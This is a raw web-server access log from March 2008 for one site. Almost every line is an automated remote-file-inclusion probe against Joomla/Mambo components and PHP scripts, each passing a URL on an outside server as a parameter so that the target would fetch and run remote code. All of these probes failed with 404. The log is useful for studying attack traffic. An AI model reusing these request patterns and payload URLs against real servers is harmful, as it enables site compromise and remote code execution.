122.201.81.6 - - [23/Mar/2008:06:40:05 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:06 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:06 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:06 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:14 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:15 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:15 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:15 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:15 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:16 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:17 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:18 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:24 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:24 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:40:25 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:06:40:54 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:06:40:56 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:06:40:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:41:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:41:07 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:41:07 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:41:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.18.76 - - [23/Mar/2008:06:41:16 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:41:18 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:41:19 -0700] "GET //main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:06:41:19 -0700] "GET /logs//main.php?sayfa=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:41:29 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:41:29 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:41:30 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:41:42 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:42:03 -0700] "GET /logs/access_080312.log/order.php?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:42:03 -0700] "GET /order.php?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:42:04 -0700] "GET /logs/order.php?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:42:56 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:06:42:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /search.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /logs/search.php?inc_dir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /search.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /logs/search.php?inc_dir=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /search.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
84.40.17.23 - - [23/Mar/2008:06:42:58 -0700] "GET /logs/search.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.225.239.55 - - [23/Mar/2008:06:43:11 -0700] "GET /errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.225.239.55 - - [23/Mar/2008:06:43:11 -0700] "GET /logs/errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:43:54 -0700] "GET /logs/access_080219.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:43:55 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:43:55 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:06:43:55 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:06:43:56 -0700] "GET /errors.php?error=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:06:43:56 -0700] "GET /logs/errors.php?error=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:06:44:08 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.53.240.146 - - [23/Mar/2008:06:44:08 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
91.121.116.120 - - [23/Mar/2008:06:44:20 -0700] "GET ////mosconfig/mvcw.php?step=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
91.121.116.120 - - [23/Mar/2008:06:44:20 -0700] "GET /logs////mosconfig/mvcw.php?step=http://www.landkreis.halberstadt.de/contenido-4.4.2/cms/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:44:54 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.208.240 - - [23/Mar/2008:06:45:28 -0700] "GET //login.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:45:41 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:45:52 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:45:58 -0700] "GET /logs/access_080306.log/components/com_artlinks/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:45:59 -0700] "GET /components/com_artlinks/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:45:59 -0700] "GET /logs/components/com_artlinks/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.250.234.234 - - [23/Mar/2008:06:46:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.250.234.234 - - [23/Mar/2008:06:46:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:06:47:12 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:16 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:16 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:17 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:48:17 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:48:26 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:48:26 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:48:26 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:48:51 -0700] "GET /logs/access_080213.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:06:50:14 -0700] "GET /logs/access_080223.log/components/com_artlinks/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:51:07 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:51:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:51:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:51:57 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:51:57 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:51:58 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:52:30 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:52:51 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:52:51 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:52:52 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:52:54 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:08 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:10 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:10 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:17 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:17 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:06:53:18 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:53:58 -0700] "GET /logs/access_080213.log/sub.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:53:59 -0700] "GET /sub.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:53:59 -0700] "GET /logs/sub.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET /logs/access_071229.log//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET //login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET //login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET /logs//login.php?dir==http://www.malteser-menden.de/images/stories/frut/r00x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.111 - - [23/Mar/2008:06:54:04 -0700] "GET /logs//login.php?dir=http://www.forgotten-brotherhood.de/cache/green2.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:54:20 -0700] "GET /logs/access.log/sub.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.111 - - [23/Mar/2008:06:54:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.75 - - [23/Mar/2008:06:54:39 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:52 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:52 -0700] "GET /comments-display-tpl.php?language_file=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:52 -0700] "GET /comments-display-tpl.php?language_file=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:52 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:53 -0700] "GET /comments-display-tpl.php?language_file=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:54:53 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:55:00 -0700] "GET /logs/access_080223.log/index.php?body=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
